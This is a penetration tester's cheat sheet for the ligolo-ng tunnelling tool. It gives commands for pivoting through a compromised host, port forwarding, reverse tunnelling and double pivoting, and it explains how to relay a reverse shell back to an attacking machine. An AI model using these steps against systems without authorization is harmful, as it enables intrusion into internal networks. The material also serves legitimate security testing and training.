> Beniamin Jablonski, 2025-01-05 # DESCRIPTION An advanced yet simple tunnelling tool that uses TUN interfaces. # INSTALLATION Download the ready-to-use released **agents** and **proxies** from [Github](https://github.com/nicocha30/ligolo-ng/releases). Add an appropriate binary to the `$PATH` directory: ```bash ln -s ~/Tools/Ligolo-ng/ligolo-ng_proxy_0.5.2_linux_arm64/proxy /usr/local/bin/ligolo ``` # EXAMPLES ## Pivoting Let's set up the `ligolo` for the following infrastructure. We control the **Attacking Machine** (`AM01`), and we gained access to the **Pivoting Machine** (`PM01`). We want to reach the **Target Machine** (`TM01`) from our **Attacking Machine** (`AM01`). ![[Pasted image 20250106231920.png]] In `root` terminal on `AM01`: ```bash # Add "ligolo" interface: ip tuntap add user root mode tun ligolo # Enable the interface: ip link set ligolo up # Launch ligolo (the ligolo interactive session is activated): ligolo -selfcert ``` We upload the appropriate **agent** on `PM01` (remember that it must fit the OS and its architecture) and launch: ```bash # Copy the agent file and launch. Determine the AM01 IP address: ./agent -connect 10.0.0.10:11601 -ignore-cert ``` Continue on the `AM01` in `ligolo` interactive session: ```bash # Execute `session` and choose the session session # Check if the remote interface can be seen ifconfig ``` In `root` terminal on `AM01`: ```bash # Add custom route: ip route add 192.168.0.0/24 dev ligolo ``` Start tunnelling using `ligolo` interactive session on `AM01`: ```bash # Start tunnelling: start ``` > [!note] > From now the traffic to `192.168.0.0/24` is redirected through `ligolo` interface. ## Local Port Forwarding If we need to access the local ports of the currently connected agent (`PM01`), there's a CIDR hardcoded in `ligolo`: _240.0.0.0/4_ (an unused IPv4 subnet). If we query an IP address on this subnet, `ligolo` will automatically redirect traffic to the agent's local IP address (`127.0.0.1`). On `AM01` in `root` shell: ```bash ip route add 240.0.0.1/32 dev ligolo nmap 240.0.0.1 -sV ``` > [!note] > More information on local port forwarding: [Documentation](https://github.com/nicocha30/ligolo-ng/wiki/Localhost). ## Reverse Tunneling For reverse tunnelling, we can use the `listener_add` command in the `ligolo` interactive session on `AM01`: ```bash listner_add --addr 0.0.0.0:<PM01_port> --to 127.0.0.1:<AM01_port> # For example: listner_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 ``` > [!note] > Let's look at the example above. From now the traffic that targets `192.168.0.1:1234` on `PM01` is redirected to `10.0.0.10:4321` on `AM01`. If we deliver a reverse shell payload to any machine on `192.168.0.0/24` it should target the `192.168.0.1:1234` port. We should prepare the listener on `10.0.0.10:4321`. It is convenient to use the same port on `AM01` and `PM01`: ``` listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp listener_add --addr 0.0.0.0:8090 --to 127.0.0.1:8090 --tcp listener_add --addr 0.0.0.0:9000 --to 127.0.0.1:9000 --tcp listener_add --addr 0.0.0.0:21037 --to 127.0.0.1:21037 --tcp listener_add --addr 0.0.0.0:21038 --to 127.0.0.1:21038 --tcp listener_add --addr 0.0.0.0:445 --to 127.0.0.1:445 --tcp ``` > [!note] > We can view currently running listeners using the `listener_list` and stop them using the `listener_stop`. ## Double Pivoting In `ligolo` interactive session: ```bash listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp ``` From the second victim machine (`PM02`) connect to the first victim machine (`PM01`): ```bash # Execute on PM02: ./agent -connect <ip_pivot_1>:11601 -ignore-cert ``` On the `AM01` in `root` terminal: ```bash ip tuntap add user root mode tun ligolo2 ip link set ligolo2 up ``` In `ligolo` interactive session on `AM01`: ```bash start --tun ligolo2 ``` # REFERENCES 1. https://github.com/nicocha30/ligolo-ng?tab=readme-ov-file 2. https://www.hackingarticles.in/a-detailed-guide-on-ligolo-ng/